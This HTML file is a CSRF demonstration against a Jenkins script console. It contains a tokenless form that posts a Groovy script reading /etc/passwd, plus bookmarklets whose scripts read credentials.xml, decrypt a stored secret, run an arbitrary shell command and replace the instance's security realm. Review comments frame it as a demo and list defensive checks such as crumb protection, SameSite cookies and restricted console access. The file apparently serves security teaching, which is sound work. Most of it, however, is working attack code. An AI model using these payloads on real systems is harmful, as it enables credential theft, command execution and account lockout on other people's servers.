csrf_demo.html
<html>
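<head>
<!-- Declare the encoding explicitly so the browser does not have to guess it. -->
<meta charset="utf-8">
<title>Security: CSRF Demo</title>
</head>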
<body>
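<!--
  CSRF demonstration form.
  It posts a single "script" field to the /script endpoint on localhost:8081
  (the rest of this page refers to it as the Jenkins script console) and
  carries no anti-CSRF token. The browser attaches whatever session cookie it
  already holds for that host, so the request runs with the signed-in user's
  rights unless the server rejects it.

  What a defender should check on the target:
    * CSRF protection (the Jenkins crumb issuer) is enabled, so a POST without
      a valid crumb is refused.
    * The session cookie is not sent on cross-site POSTs (SameSite attribute).
    * Access to the script console is limited to the few administrators who
      need it.
  The textarea content is the demo payload and is submitted as written.
-->
<form method="POST" action="http://localhost:8081/script">
<textarea name="script">
println 'I hacked you.'
new File('/etc/passwd').text
</textarea>
<!-- The original markup read value"Submit" (missing "="), so the label was never applied. -->
<input type="submit" value="Submit">
</form>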
<!--
  Helper bookmarklets for the live demo, collapsed by default.
  Each link is a javascript: URL meant to be bookmarked and then run while the
  script console page is open (see the paragraph below). Every bookmarklet
  does the same thing with a different script argument:
    1. takes the second form element in the current document,
    2. replaces it with a deep clone of itself,
    3. writes the script text into the element with id "script",
    4. submits the cloned form.
  NOTE(review): cloning presumably drops listeners attached to the original
  form; confirm against the console page.
  NOTE(review): the href values contain double quotes inside a double-quoted
  attribute, the headings jump from h2 to h5, and there is one extra closing
  ul before the end of this block. Run the file through an HTML validator.
-->
<details>
<summary>Demo links (click to expand)</summary>
<h2>Demo link <a href="https://en.wikipedia.org/wiki/Bookmarklet">bookmarklets</a></h2>
<p>Bookmark these bookmarklets so they can be run on the script console page to show examples.</p>
<!-- Harmless warm-up examples: an empty script and a two-line println. -->
<ul>
<li>
<a href="javascript:(function(script){var old_element = document.getElementsByTagName('form')[1];var new_element = old_element.cloneNode(true);old_element.parentNode.replaceChild(new_element, old_element);document.getElementById('script').innerHTML = script;new_element.submit()})("")">Blank example</a>
</li>
<li>
<a href="javascript:(function(script){var old_element = document.getElementsByTagName('form')[1];var new_element = old_element.cloneNode(true);old_element.parentNode.replaceChild(new_element, old_element);document.getElementById('script').innerHTML = script;new_element.submit()})("println 'hello'\nprintln 'world'")">Multiline print Hello world</a>
</li>
</ul>
<!--
  Impact examples. The three scripts read credentials.xml under the Jenkins
  root, pass a stored ciphertext to hudson.util.Secret.fromString, and run a
  shell command through Groovy's String.execute(). Together they show that
  anyone who can submit a script to the console can read stored credentials
  and run commands on the host, which is why that endpoint needs CSRF
  protection and tightly restricted access.
  NOTE(review): the embedded ciphertext presumably only decrypts on the
  instance whose keys produced it; confirm it is a throwaway demo value.
-->
<h5>Security Demo</h5>
<ul>
<li>
<a href="javascript:(function(script){var old_element = document.getElementsByTagName('form')[1];var new_element = old_element.cloneNode(true);old_element.parentNode.replaceChild(new_element, old_element);document.getElementById('script').innerHTML = script;new_element.submit()})('new File("${Jenkins.instance.root}/credentials.xml").text')">Read credentials.xml</a>
</li>
<li>
<a href="javascript:(function(script){var old_element = document.getElementsByTagName('form')[1];var new_element = old_element.cloneNode(true);old_element.parentNode.replaceChild(new_element, old_element);document.getElementById('script').innerHTML = script;new_element.submit()})("import hudson.util.Secret\nSecret.fromString('{AQAAABAAAAAguhcOTpI3ac2aBGO+GNvqpdgViNEjlrHGFuV+oI9mvh1DSIEK4hVZswvYKugpNGkG}')")">Decrypt secret from credentials.xml</a>
</li>
<li>
<a href="javascript:(function(script){var old_element = document.getElementsByTagName('form')[1];var new_element = old_element.cloneNode(true);old_element.parentNode.replaceChild(new_element, old_element);document.getElementById('script').innerHTML = script;new_element.submit()})('"ls -l ${Jenkins.instance.root.toString()}".execute().text')">Execute arbitrary shell command</a>
</li>
</ul>
<!--
  Configuration examples. The first, second and fourth only read state (method
  names, the current security realm, the global config.xml). The third builds
  a GithubSecurityRealm from placeholder strings and installs it with
  setSecurityRealm, so it changes how the instance authenticates users.
  NOTE(review): presumably this locks out existing logins until the realm is
  restored; confirm before running it outside a disposable instance.
-->
<h5>Configuration Demo</h5>
<ul>
<li>
<a href="javascript:(function(script){var old_element = document.getElementsByTagName('form')[1];var new_element = old_element.cloneNode(true);old_element.parentNode.replaceChild(new_element, old_element);document.getElementById('script').innerHTML = script;new_element.submit()})("Jenkins.getInstance().metaClass.methods*.name.sort().unique()")">List methods on Jenkins.instance</a>
</li>
<li>
<a href="javascript:(function(script){var old_element = document.getElementsByTagName('form')[1];var new_element = old_element.cloneNode(true);old_element.parentNode.replaceChild(new_element, old_element);document.getElementById('script').innerHTML = script;new_element.submit()})("Jenkins.instance.securityRealm")">Call getSecurityRealm</a>
</li>
<li>
<a href="javascript:(function(script){var old_element = document.getElementsByTagName('form')[1];var new_element = old_element.cloneNode(true);old_element.parentNode.replaceChild(new_element, old_element);document.getElementById('script').innerHTML = script;new_element.submit()})("import org.jenkinsci.plugins.GithubSecurityRealm\nprintln Jenkins.instance.getSecurityRealm()\ndef x = new GithubSecurityRealm('hello', 'goodbye', 'foo', 'bar', 'dont care')\nprintln x\nJenkins.instance.setSecurityRealm(x)")">Configure GitHub Security Realm</a>
</li>
<li>
<a href="javascript:(function(script){var old_element = document.getElementsByTagName('form')[1];var new_element = old_element.cloneNode(true);old_element.parentNode.replaceChild(new_element, old_element);document.getElementById('script').innerHTML = script;new_element.submit()})('new File("${Jenkins.instance.root}/config.xml").text')">Read Global config.xml</a>
</li>
</ul>
</ul>
</details>
</body>
</html>